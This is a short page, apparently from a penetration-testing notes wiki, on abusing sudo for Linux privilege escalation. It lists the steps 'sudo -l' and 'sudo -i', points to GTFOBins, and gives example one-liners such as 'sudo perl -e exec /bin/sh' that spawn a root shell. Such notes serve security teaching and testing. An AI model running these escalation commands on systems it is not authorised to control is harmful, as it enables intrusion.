Abusing Sudo

1

List allowed commands for current user

sudo -l
2

If permission is (ALL) ALL

sudo -i
3

Base on the commands allowed search the internet

LogoGTFOBins
4

Exploit

EXAMPLE:

sudo apt-get changelog apt
sudo perl -e 'exec "/bin/sh";'
5

Enter command in newly spawned shell

PreviousAbusing Setuid Binaries and CapabilitiesNextExploits

Last updated